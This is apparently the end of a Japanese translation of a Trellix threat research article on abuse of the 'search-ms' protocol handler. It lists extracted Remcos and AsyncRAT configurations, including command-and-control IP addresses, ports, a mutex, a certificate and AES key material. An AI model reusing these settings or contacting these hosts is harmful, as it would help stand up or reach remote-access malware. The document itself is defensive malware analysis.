Take_Screenshot: True

Mouse_option: False

Delete_file: False

Audio_record_time: 5

Audio_path: %ProgramFiles%

Connect_delay: 0

Copy_dir: Remcos

Keylog_dir: Mozila

AsyncRAT Configuration

C2

79.110.49.162, 111.90.150.186

Ports

6606,7707,8808, 8753,8977,9907

Botnet

Default

Version

0.5.7B

AutoRun

FALSE

Mutex

AsyncMutex_6SI8OkPnk

InstallFolder

%AppData%

BSoD

FALSE

AntiVM

FALSE

Cert1

MIIE8jCCAtqgAwIBAgIQAI5BDBpeCTNsOSTXCKCKpTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNjI0MDAxODQ4WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALa46FJI8u/4jUwxfEcHQEDPGroGAEzlJsx1nSk5/L2JCWHSqdWOhEtoUMp1QsLxbTaq5IiN28rGy/6oOxzAmxyk1lK+z/haGBu3w9ae8JAsgAM2v2ClGBL67/lgeO7h5AYeCUpxitXGTCdhnMyeR9O+g94lidCbp6Y/Rbj3Wdu5nzSURFEPdkW3t6/jAVdRH+VuFqmOs0SSe71W+J1Ltnby65MkMb0p2q0BZV8YhSEsSD+yC/ilOdyCKLa70PXyl25vPmV0+VZxV/gOZY+wdsMHJiBvRX+fGuLRNK0Ti8J7yZMONPGS/NmhwkE4Kx/WMvC1Af1syI/2u1cbLRrna/NtPejXgpzz9TV5B04pWbLpT4BV6MgUsjkV4akmXEf6mK+veI2FjVdmCWpujmppt5WG40ay1y8YRJD/QxHfMbqJocFp+9jRGamhXAAj2PQK63GA8Iz9OCzggD0tqG01Wz90z70ooIz2DrHETXSzgpgTRwbTJG4KmwZTWUUTEXXZsJhKBOOWDaqazbA3wxxea6vdXsx2wpf82LFliEpFdMdDHNEiblpLYWD1dtEw4ehIcMpZUm/Ua4DB/OGlARm/NA+/TBxemlcfgblyPVxBn++f+mkoHHW5+0Or9SqMhY/74s8zgOFYp1cTZG97ZD5jgaNVrFPHFUtnZPfLTV8BG/mRAgMBAAGjMjAwMB0GA1UdDgQWBBScePgUNtG8SPP55ahFlKPcwH7PuTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBKbdjP6gzZShADcF6siolFE0OpO+vWwVSOdKv/lMxW4mscBZhHZeCrwe3tZjGW3HTAx2wZikSU3SjC9XL/Ei/FqIvP5WubvtshCGMuXIf4aQkkWtzq0Ts1J0XZLtC6fKCoilYq0rNrTn6PRuOnwY4sTN0MlULtZJu1PqRP9YeFWYwMzwZ02FalqnjkOSQ/1y5j11P7SSnJTPNk2/+5Sba0b8qlVPj0CZ7kPxwNqKAOOyC5Q4sqCvS7F7W91WLif7l6PjDoDqk3bdFvrvT7bIFew7o1ZjORYpq+iOPdoybFkyawSEtVgxeJUQ/tV+qM72avws7BugxxVNL4ZCYb69e4spdSH1rwf8w40l4fBMJ5HhFS3erEbRij8FmbSK/78miQaimrSqiS0FG+kFm1paOWdIsZYYhR8sq/ALccUG5ju3cI9q46gt5hIk66TY8LMJtzQc2tyMsge3lodnl9l66Fo1HuW5tgSQ5ntx/Fog9G6qYFvCHsGH7FMkwCMppiyYoYa4+TghvqSmeaCurjjIYex/GXFMOTyU7lmPDfDpZpTMEU54qw19A95T0O49DIzN5U7I8OGdm5/uCBSvaK33KzwTfxgfROQbZR8ZJ/Rm5RBbz6HdAk1io2Bu9+S0VKXPMzcYguSQ8sLJt+G6W3HbAtYWM9DOFlR2ajiW/ULKq9QA==

Server_Signature:

WgJ3rQ4t6UJG3q/lXzUo9RAADSp1m2PQaonNWi20VF+auR3rkxQXV4g3j7IPQ4OxCclMC5/vYgPpfMIl+RezYETzQIx0qXIYeSnHznrm76WiZMYgsxHkFxPySIJW1f2IzUpEyrdONzhg/odXNBRAjmi5L4E94xI4keXiMaa9D0K4uOBMAuPslJ1wbHiuVKf3wgqu8G809j1jWTmRJ4/kYjsh63+qjyhRTTC1xgqqaMhCndEcHvlHR+nBifGpL3NQM2iyE9RJCc48w55txTcqUZkX9dhab0XZy3iH6v73+lwdB+Y7O2zSXU+lboTiKkarnRx4BvCZUZNuI/JBm3A+KlJvEyqCq8Cg3oUpGv3zxavhHYv2VJXs4DrDFJoNGnhsrDAUARMWjfQ/skPd8QGkf8PfcZJaNmAeTpLbNt8DKe9ZmA5q7mfSp7S6lk8WNxu4+ayK6GRBSN3p4NgtLo85o66Ivowo5jvOVB3iwDPptxs2fgehFqgORY19hbhmoJ3BEMsYOLSgtUSAhuFg4HvCYEQh/LxPnxpH17QMAlyl0Xb/+JoycFyX1rIyegk4q2BIClYeFbFZEsa7qTOWQl32J0urav1WmwGV3ezc7oeaH6AkrTJLTFqePt2FUP7LoBzAb4Fv2RtNkR/bov6WdrNwQO/Di/idBmI7wQFmSzYhs28=

AES:

02630f7bfb8bafcd79ec1c49e1d7184c15d03f662e520f6ee201ae7cd14247e6

Salt:

bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941

この文書およびここに含まれる情報は、教育目的およびTrellixの顧客の便宜のみを目的としたコンピュータセキュリティリサーチを記述したものです。
※本ページの内容は2023年7月26日(US時間)更新の以下のTrellix Storiesの内容です。
原文: Beyond File Search: A Novel Method for Exploiting the “search-ms” URI Protocol Handler
著者:  Mathanraj Thangaraju, Sijo Jacob